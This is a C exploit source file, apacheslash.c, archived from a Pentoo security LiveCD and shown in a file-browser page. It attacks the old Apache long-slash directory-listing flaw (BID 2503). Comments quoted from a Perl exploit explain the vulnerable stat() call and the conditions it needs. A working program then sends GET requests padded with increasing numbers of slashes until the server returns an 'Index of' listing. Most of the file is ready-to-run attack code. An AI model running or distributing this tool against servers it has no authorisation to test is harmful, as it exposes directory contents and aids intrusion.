home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / apache / apacheslash.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  7.3 KB  |  248 lines
  1. /*
  2. Program: apacheslash.c
  3. Original Date: 2-21-02
  4. Version: 1.0
  5. Platform: Linux (compiled on SuSE 7.3)
  6. c0der: st0ic
  7. site: www.fsix.net
  8. e-mail: st0ic@blackcodemail.com
  9.  
  10. Revised:
  11.     NONE thus far
  12.  
  13. Description: This program tests an Apache installation for the "Apache Artificially Long Slash Path 
  14. Directory Listing Exploit."  See SecurityFocus.com BID 2503 - http://online.securityfocus.com/bid/2503 
  15.  
  16. Compile: gcc apacheslash.c -o apacheslash
  17.  
  18. Stuff: I know theres already 3 Perl scripts that test this bug out, but there execution time is horrible
  19. so I was bored and decided to recode it in C for execution speed sake. On my box, I think it took
  20. about 8 mins to send 1000 /'s to apache with apache2.pl. It takes about 2 seconds with this program.
  21. BTW, SuSE 7.3 comes with Apache 1.3.20, which is NOT vulnerable :-). Check out the securityfocus.com
  22. BID 2503 to find out whats vulnerable and whats not.
  23.  
  24. I also included the comments from apache2.pl exploit which was modified
  25. by Siberian of sentry-labs.com. Read below for the details:
  26.  
  27. /*************************************************
  28. #!/usr/bin/perl
  29. #
  30. # orginal by farm9, Inc. (copyright 2001)
  31. # new modified code by Siberian (www.sentry-labs.com)
  32. #
  33. ########################################################################################
  34. #
  35. # Note: This isn't the orginal exploit! This one was modified and partly rewritten. 
  36. #
  37. # Changes:
  38. #
  39. # - help added (more user firendly :-) )
  40. # - messages added 
  41. # - exploit is now able to be executed on WinNT or 2k.
  42. # - uses perl version of BSD sockets (compatible to Windows)
  44. # Rewriter's Note: I rewrote (I was bored to death that evening :-) ) some
  45. # of the code and made it esaier to use and cross platform compatible.
  46. # The old verion used a esaier but not that compaible way of socket stream communication.  
  47. # Any network code was replaced by cross platform compatible BSD sockets.
  48. # (much better than any other stream method :-) )
  50. # Tested with Perl 5.6 (Linux) and ActivePerl 5.6 (Win32)
  51. #
  52. # Original comment and source is attached below.
  53. #
  54. ########################################################################################
  55. #
  56. # Name: Apache Artificially Long Slash Path Directory Listing Exploit
  57. # Author: Matt Watchinski
  58. # Ref: SecurityFocus BID 2503
  59. #
  60. # Affects: Apache 1.3.17 and below
  61. # Tested on: Apache 1.3.12 running on Debian 2.2
  62. #
  63. # Info:  This exploit tricks apache into returning a Index of the a directory
  64. #    even if an index.html file is present.  May not work on some OS's
  65. #
  66. # Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in
  67. #       very specific cases would feed stat() a filename that was longer than
  68. #       stat() could handle.  This would result in a condition where stat()
  69. #       would return 0 and a directory index would be returned instead of the
  70. #       default index.html.
  71. #
  72. # Code Fragment: /src/main/http_request.c
  73. #    if (strchr(new_file, '/') == NULL) {
  74. #        char *udir = ap_make_dirstr_parent(rnew->pool, r->uri);
  75. #
  76. #        rnew->uri = ap_make_full_path(rnew->pool, udir, new_file);
  77. #        rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file);
  78. #        ap_parse_uri(rnew, rnew->uri);    /* fill in parsed_uri values */    /*
  79. #        if (stat(rnew->filename, &rnew->finfo) < 0) {   <-- Important part
  80. #            rnew->finfo.st_mode = 0;
  81. #        }
  82. #
  83. # Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled
  84. #          The directory must also have the following Options enabled:
  85. #             Indexes and MultiView
  86. #          Some OS's have different conditions on the number of character
  87. #          you have to pass to stat to make this work.  If stat doesn't
  88. #          return 0 for path names less than 8192 or so internal apache
  89. #          buffer checks will stop this exploit from working.
  90. #
  91. #           Debian needed around 4060 /'s to make this work.
  92. #
  93. # Greets: Special thanks to natasha who added a lot of debug to apache for me
  94. #      while i was trying to figure out what had to be enabled to make this
  95. #      exploit work.  Also thanks to rfp for pointing out that MultiView
  96. #      needed to be enabled.
  97. #
  98. # More Greets:  Jeff for not shooting me :) <All your Cisco's belong to us>
  99. #               Anne for being so sexy <I never though corporate espionage
  100. #                   would be so fun>
  101. #               All my homies at farm9
  102. #               DJ Charles / DJ NoloN for the phat beats
  103. #               Marty (go go gadget snort)
  104. #               All my ex-bees
  105. #               RnVjazpIaXZlcndvcmxk
  106. #
  107. # I think that wraps it up.  Have fun.
  108. -----snip snip----
  109. **************************************************/
  110.  
  111. #include <stdio.h>
  112. #include <string.h>
  113. #include <errno.h>
  114. #include <stdlib.h>
  115. #include <netdb.h>
  116. #include <sys/types.h>
  117. #include <sys/socket.h>
  118. #include <netinet/in.h>
  119. #include <unistd.h>
  120.  
  121. char tmp[10240];
  122. char output[10240];
  123. char *get = "GET ";
  124. char *slash = "/";
  125. char *http = " HTTP/1.0\r\n";
  126. char *end = "\r\n\r\n";
  127. int c, x;
  128. int port;
  129. int low;
  130. int max;
  131. int sockfd;
  132. int bytes_recieved;
  133. int count;
  134. char *addr;
  135.  
  136. struct sockaddr_in dest_addr;
  137. struct hostent *he;
  138.  
  139. void usage(char *ptr)
  140. {
  141.     fprintf(stderr, "\n\t%s <-h host> <-p port> <-l LOW> <-m MAX>", ptr);
  142.     fprintf(stderr, "\n\tExample: %s -h 127.0.0.1 -p 80 -l 1 -m 1000\n", ptr);
  143.     fprintf(stderr, "\n\tLOW is how many /'s to start with and MAX is how many /'s to end with.\n\n");
  144.     exit(1);
  145. }
  146.  
  147.  
  148. int main(int argc, char *argv[])
  149. {
  150.     printf("\n\t[       apacheslash.c     ]");
  151.     printf("\n\t[      c0ded by st0ic     ]");
  152.     printf("\n\t[         Fsix.Net        ]");
  153.     printf("\n\t[ st0ic@happyhack.zzn.com ]\n\n");
  154.  
  155.     while ( ( c = getopt(argc, argv, "h:p:l:m:") ) != -1)
  156.     {
  157.         switch(c)
  158.         {
  159.             case 'h':
  160.             {
  161.                 addr = optarg;
  162.                 break;
  163.             }
  164.             case 'p':
  165.             {
  166.                 port = atoi(optarg);
  167.                 break;
  168.             }
  169.             case 'l':
  170.             {
  171.                 low = atoi(optarg);
  172.                 break;
  173.             }
  174.             case 'm':
  175.             {
  176.                 max = atoi(optarg);
  177.                 break;
  178.             }
  179.             default:
  180.                 usage(argv[0]);
  181.         }
  182.     }
  183.  
  184.     if ( low > max || addr == NULL )
  185.         usage(argv[0]);
  186.  
  187.     if ( (he = gethostbyname(addr)) == NULL)
  188.     {
  189.         perror("gethostbyname");
  190.         exit(1);
  191.     }
  192.  
  193.     dest_addr.sin_family = AF_INET;
  194.     dest_addr.sin_addr = *( (struct in_addr *) he->h_addr);
  195.     dest_addr.sin_port = htons(port);
  196.     memset (&dest_addr.sin_zero, 0, 8);
  197.     
  198.     printf("\t\n....Working....\n");
  199.     
  200.     while (low <= max)
  201.     {
  202.         count = low;
  203.         bzero(tmp, sizeof(tmp) );
  204.         
  205.         if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0) ) == -1)
  206.         {
  207.             perror("socket");
  208.             break;
  209.         }
  210.  
  211.         if (connect (sockfd, (struct sockaddr_in *) &dest_addr, sizeof(dest_addr) ) == -1)
  212.         {
  213.             perror("connect");
  214.             exit(1);
  215.         }
  216.         
  217.         strcpy(tmp, get);
  218.         
  219.         /* copy the necessary slashes. */
  220.         for(x = 0; x < count; x++)
  221.             strcat(tmp, slash);
  222.         
  223.         strcat(tmp, http);
  224.         strcat(tmp, end);
  225.         
  226.         send(sockfd, tmp, sizeof(tmp), 0);
  227.         
  228.         bytes_recieved = 1;
  229.         while(bytes_recieved > 0)
  230.         {
  231.             bytes_recieved = recv(sockfd, output, sizeof(output), 0);
  232.             if ( (strstr(output, "Index of") ) != NULL)
  233.             {
  234.                 printf("\n\tNumber of \"/\"'s required to generate a directory listing = %d\n", low);
  235.                 close(sockfd);
  236.                 exit(0);
  237.             }
  238.         }
  239.         
  240.         low++;
  241.         close(sockfd);
  242.     }
  243.     
  244.     printf("\nHost does not appear to be vulnerable. Maybe try some different numbers...\n");
  245.     
  246.     return 0;
  247. }
  248.